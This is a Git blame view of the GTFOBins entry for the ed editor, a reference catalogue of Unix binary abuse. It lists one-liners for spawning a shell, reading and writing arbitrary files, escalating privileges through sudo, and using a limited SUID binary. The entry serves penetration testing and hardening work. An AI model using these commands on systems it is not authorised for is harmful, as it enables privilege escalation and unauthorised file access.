1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 19:01:59 +02:00
GTFOBins.github.io/_gtfobins/ed.md

29 lines
363 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: |
ed
!/bin/sh
2018-07-04 20:26:52 +02:00
file-write:
2018-07-16 15:01:50 +02:00
- code: |
ed file_to_write
2018-08-20 14:16:03 +02:00
a
DATA
2018-08-20 14:16:03 +02:00
.
2018-07-16 15:01:50 +02:00
w
2018-08-20 14:16:03 +02:00
q
2018-07-04 20:26:52 +02:00
file-read:
2018-08-20 14:16:03 +02:00
- code: |
ed file_to_read
,p
q
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: |
sudo ed
!/bin/sh
2018-10-05 19:55:38 +02:00
limited-suid:
2018-07-16 15:01:50 +02:00
- code: |
./ed
!/bin/sh
---